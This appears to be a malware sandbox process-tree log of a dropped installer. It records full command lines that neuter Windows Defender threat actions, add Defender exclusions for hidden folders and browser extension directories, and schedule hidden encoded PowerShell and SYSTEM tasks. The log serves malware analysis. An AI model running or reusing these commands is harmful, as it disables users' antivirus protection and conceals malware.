C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1672 -ip 16721⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2060 -ip 20601⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF453.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSF453.tmp\Install.exe cY /lDRdidQrKT 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VsVHNYITDnqCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VsVHNYITDnqCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhQqVpMUuwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhQqVpMUuwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lwqGFNNkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lwqGFNNkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ooaqkSSxqGyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ooaqkSSxqGyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rNTGojywzibeDzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rNTGojywzibeDzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TvSdAjXLYNsucLRI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TvSdAjXLYNsucLRI\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VsVHNYITDnqCC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VsVHNYITDnqCC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VsVHNYITDnqCC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhQqVpMUuwUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhQqVpMUuwUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\beIflBxZQdcSoxIZQvR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\beIflBxZQdcSoxIZQvR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lwqGFNNkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lwqGFNNkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ooaqkSSxqGyU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ooaqkSSxqGyU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rNTGojywzibeDzVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rNTGojywzibeDzVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TvSdAjXLYNsucLRI /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TvSdAjXLYNsucLRI /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guVjYISOF" /SC once /ST 03:41:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guVjYISOF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guVjYISOF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ltbOwrqBWDKUbrYld" /SC once /ST 12:31:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\SQNfYWE.exe\" xj /WqJVdidMj 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ltbOwrqBWDKUbrYld"2⤵
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
